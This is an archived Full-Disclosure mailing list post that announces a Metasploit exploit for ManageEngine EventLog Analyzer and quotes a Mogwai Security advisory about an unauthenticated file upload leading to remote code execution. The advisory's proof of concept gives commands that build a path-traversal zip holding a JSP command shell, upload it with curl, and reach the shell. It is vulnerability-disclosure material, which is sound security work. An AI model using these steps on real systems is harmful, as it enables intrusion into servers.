lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Mon, 1 Sep 2014 08:20:30 +0100
From: Pedro Ribeiro <pedrib@...il.com>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] [The ManageOwnage Series,
 part IV]: RCE / file upload in Eventlog Analyzer,
 feat. special guests h0ng10 and Mogwai Security

Hi all,

h0ng10 from Mogway Security has found a file upload leading to RCE in
Eventlog Analyzer (see advisory below for a snippet or go to
http://seclists.org/fulldisclosure/2014/Aug/86).

h0ng10 communicated this over a year ago to ManageEngine but they
failed to fix it. When I found and communicated the same vulnerability
to ManageEngine a week ago, they accepted my report as valid and said
they would look into it. There was no mention of h0ng10's previous
discovery, so I don't know what they did with it - perhaps they "lost"
or "misplaced" it?

Anyway, I had an exploit ready for when they fixed it, but since it's
the vulnerability information is out, I'm releasing the exploit today.
The exploit credit's h0ng10 as the original vulnerability discoverer
and can be found at:
https://github.com/rapid7/metasploit-framework/pull/3732
This will hopefully be integrated in Metasploit soon. The exploit has
been thoroughly tested in many Windows and Linux versions.

Thanks to h0ng10 and Mogwai Security for featuring in the ManageOwnage Series!

Regards,
Pedro

On 31 August 2014 16:39, Advisories <advisories@...waisecurity.de> wrote:
> Mogwai Security Advisory MSA-2014-01
> ----------------------------------------------------------------------
> Title:              ManageEngine EventLog Analyzer Multiple Vulnerabilities
> Product:            ManageEngine EventLog Analyzer
> Affected versions:  EventLog Analyzer 9.9 (Build 9002) on Windows/Linux
> Impact:             critical
> Remote:             yes
> Product link:       http://www.manageengine.com/products/eventlog/
> Reported:           18/04/2013
> by:                 Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
>
>
>
>
> Vulnerability description:
> ----------------------------------------------------------------------
> 1) Unauthenticated remote code execution
> ME EventLog Analyzer contains a "agentUpload" servlet which is used by Agents
> to send log data as zip files to the central server. Files can be uploaded
> without
> authentication and are stored/decompressed in the "data" subdirectory.
>
> As the decompress procedure is handling the file names in the ZIP file in a
> insecure way it is possible to store files in the web root of server. This can
> be used to upload/execute code with the rights of the application server.
>
>
> Proof of concept:
> ----------------------------------------------------------------------
> 1) Unauthenticated remote code execution
>
>
> - Create a malicious zip archive with the help of evilarc[1]
> evilarc.py -d 2 -o unix -p webapps/event cmdshell.jsp
> - Send the malicious archive to the agentUpload servlet
> curl -F "payload=@...l.zip" http://172.16.37.131:8400/agentUpload
> - Enjoy your shell
> http://172.16.37.131:8400/cmdshell.jsp
>
> A working Metasploit module will be released next week.
>

> ----------------------------------------------------------------------
> Mogwai, IT-Sicherheitsberatung Muench
> Steinhoevelstrasse 2/2
> 89075 Ulm (Germany)
>
> info@...waisecurity.de
>

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

Powered by blists - more mailing lists